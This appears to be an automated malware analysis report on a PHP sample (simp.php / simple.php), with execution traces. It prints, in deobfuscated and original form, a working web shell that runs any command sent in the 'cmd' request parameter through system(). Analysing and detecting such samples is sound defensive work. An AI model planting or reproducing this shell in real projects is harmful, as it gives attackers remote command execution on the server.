PHP Malware Analysis
simp.php, simple.php
md5: 8f290d11549d11af9c94d39c974df35e
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Deobfuscated PHP code
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>";
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "</pre>";
die;
}Execution traces
data/traces/8f290d11549d11af9c94d39c974df35e_trace-1676249673.4849.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:54:59.382690]
1 0 1 0.000157 393528
1 3 0 0.000210 394616 {main} 1 /var/www/html/uploads/simple.php 0 0
1 3 1 0.000227 394616
0.000252 314240
TRACE END [2023-02-12 22:54:59.382820]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:40:48.456436]
1 0 1 0.000151 393512
1 3 0 0.000204 394592 {main} 1 /var/www/html/uploads/simp.php 0 0
1 3 1 0.000221 394592
0.000244 314224
TRACE END [2023-02-13 00:40:48.456560]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>